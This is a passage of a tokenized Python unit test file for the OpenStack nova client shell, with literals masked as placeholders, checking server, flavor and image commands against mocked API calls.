<EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> } <EOL> } ) <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_boot_with_poll ( self , poll_method ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT:1> , poll_method . call_count ) <EOL> poll_method . assert_has_calls ( <EOL> [ mock . call ( self . shell . cs . servers . get , <NUM_LIT> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] ) ] ) <EOL> def test_boot_with_poll_to_check_VM_state_error ( self ) : <EOL> self . assertRaises ( exceptions . ResourceInErrorState , self . run_command , <EOL> '<STR_LIT>' ) <EOL> def test_boot_named_flavor ( self ) : <EOL> self . run_command ( [ "<STR_LIT>" , "<STR_LIT>" , FAKE_UUID_1 , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:3>" , "<STR_LIT>" ] ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' + FAKE_UUID_1 , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : FAKE_UUID_1 , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> } , pos = <NUM_LIT:4> ) <EOL> def test_boot_invalid_ephemeral_data_format ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( argparse . ArgumentTypeError , self . run_command , cmd ) <EOL> def test_flavor_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_list_with_extra_specs ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . assert_called_anytime ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_list_with_all ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_list_with_limit_and_marker ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_show_with_alphanum_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_show_by_name ( self ) : <EOL> self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:3> ) <EOL> def test_flavor_show_by_name_priv ( self ) : <EOL> self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:3> ) <EOL> def test_flavor_key_set ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_flavor_key_unset ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_flavor_access_list_flavor ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_access_list_bad_filter ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_flavor_access_list_no_filter ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_flavor_access_list_public ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_flavor_access_add_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_flavor_access_add_by_name ( self ) : <EOL> self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_flavor_access_remove_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_flavor_access_remove_by_name ( self ) : <EOL> self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_image_show ( self ) : <EOL> _ , err = self . run_command ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , err ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_image_meta_set ( self ) : <EOL> _ , err = self . run_command ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , err ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_image_meta_del ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , six . StringIO ( ) ) <EOL> @ mock . patch ( '<STR_LIT>' , six . StringIO ( ) ) <EOL> def test_image_meta_bad_action ( self ) : <EOL> self . assertRaises ( SystemExit , self . run_command , <EOL> '<STR_LIT>' ) <EOL> def test_image_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_create_image ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : { } } } , <EOL> ) <EOL> def test_create_image_with_metadata ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } } , <EOL> ) <EOL> def test_create_image_show ( self ) : <EOL> output , _ = self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : { } } } , <EOL> ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create_image_with_poll ( self , poll_method ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : { } } } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT:1> , poll_method . call_count ) <EOL> poll_method . assert_has_calls ( <EOL> [ mock . call ( self . shell . cs . images . get , '<STR_LIT>' , '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] ) ] ) <EOL> def test_create_image_with_poll_to_check_image_state_deleted ( self ) : <EOL> self . assertRaises ( <EOL> exceptions . InstanceInDeletedState , self . run_command , <EOL> '<STR_LIT>' ) <EOL> def test_image_delete ( self ) : <EOL> _ , err = self . run_command ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , err ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_image_delete_multiple ( self ) : <EOL> self . run_command ( '<STR_LIT>' % ( FAKE_UUID_1 , FAKE_UUID_2 ) ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' + FAKE_UUID_1 , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' + FAKE_UUID_1 , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' + FAKE_UUID_2 , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' + FAKE_UUID_2 , pos = <NUM_LIT:3> ) <EOL> def test_list ( self ) : <EOL> self . run_command ( '<STR_LIT:list>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_minimal ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_deleted ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_with_images ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_with_flavors ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_by_tenant ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_list_by_user ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_list_with_single_sort_key_no_dir ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , ( '<STR_LIT>' ) ) <EOL> def test_list_with_single_sort_key_and_dir ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , ( '<STR_LIT>' ) ) <EOL> def test_list_with_sort_keys_no_dir ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def test_list_with_sort_keys_and_dirs ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def test_list_with_sort_keys_and_some_dirs ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def test_list_with_invalid_sort_dir_one ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_list_with_invalid_sort_dir_two ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_list_sortby_index_with_sort ( self ) : <EOL> for cmd in [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] : <EOL> with mock . patch ( '<STR_LIT>' ) as mock_print_list : <EOL> self . run_command ( cmd ) <EOL> mock_print_list . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , mock . ANY , sortby_index = None ) <EOL> def test_list_sortby_index_without_sort ( self ) : <EOL> for cmd in [ '<STR_LIT:list>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> with mock . patch ( '<STR_LIT>' ) as mock_print_list : <EOL> self . run_command ( cmd ) <EOL> mock_print_list . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , mock . ANY , sortby_index = <NUM_LIT:1> ) <EOL> def test_list_fields ( self ) : <EOL> output , _ = self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> def test_list_invalid_fields ( self ) : <EOL> self . assertRaises ( exceptions . CommandError , <EOL> self . run_command , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def test_list_with_marker ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_with_limit ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_with_changes_since ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_with_changes_since_invalid_value ( self ) : <EOL> self . assertRaises ( exceptions . CommandError , <EOL> self . run_command , '<STR_LIT>' ) <EOL> def test_meta_parsing ( self ) : <EOL> meta = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ref = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> parsed_meta = novaclient . v2 . shell . _meta_parsing ( meta ) <EOL> self . assertEqual ( ref , parsed_meta ) <EOL> def test_reboot ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ) <EOL> def test_reboot_many ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , pos = - <NUM_LIT:1> ) <EOL> def test_rebuild ( self ) : <EOL> output , _ = self . run_command ( '<STR_LIT>' % FAKE_UUID_1 ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_1 , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : FAKE_UUID_1 } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_2 , pos = <NUM_LIT:5> ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> def test_rebuild_password ( self ) : <EOL> output , _ = self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % FAKE_UUID_1 ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_1 , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : FAKE_UUID_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_2 , pos = <NUM_LIT:5> ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> def test_rebuild_preserve_ephemeral ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> % FAKE_UUID_1 ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_1 , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : FAKE_UUID_1 , <EOL> '<STR_LIT>' : True } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_2 , pos = <NUM_LIT:5> ) <EOL> def test_rebuild_name_meta ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' % FAKE_UUID_1 ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_1 , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : FAKE_UUID_1 , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_2 , pos = <NUM_LIT:5> ) <EOL> def test_start ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_start_with_all_tenants ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_stop ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_stop_with_all_tenants ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_pause ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_unpause ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_lock ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_unlock ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_suspend ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_resume ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_rescue ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_rescue_password ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_rescue_image ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> def test_unrescue ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_shelve ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_shelve_offload ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> def test_unshelve ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_migrate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_rename ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } ) <EOL> def test_resize ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> def test_resize_confirm ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> def test_resize_revert ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> @ mock . patch ( '<STR_LIT>' , mock . Mock ( return_value = '<STR_LIT:p>' ) ) <EOL> def test_set_password ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:p>' } } ) <EOL> @ mock . patch ( '<STR_LIT>' , mock . Mock ( return_value = '<STR_LIT:p>' ) ) <EOL> def test_root_password ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:p>' } } ) <EOL> def test_scrub ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , <EOL> pos = - <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : None } , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_2 , pos = <NUM_LIT:4> ) <EOL> def test_show_no_image ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_show_bad_id ( self ) : <EOL> self . assertRaises ( exceptions . CommandError , <EOL> self . run_command , '<STR_LIT>' ) <EOL> def test_show_unavailable_image_and_flavor ( self ) : <EOL> output , _ = self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:8> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , <EOL> pos = - <NUM_LIT:7> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , <EOL> pos = - <NUM_LIT:3> ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_print_server ( self , mock_print_dict ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> args , kwargs = mock_print_dict . call_args <EOL> parsed_server = args [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> parsed_server [ '<STR_LIT>' ] ) <EOL> def test_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_force_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , 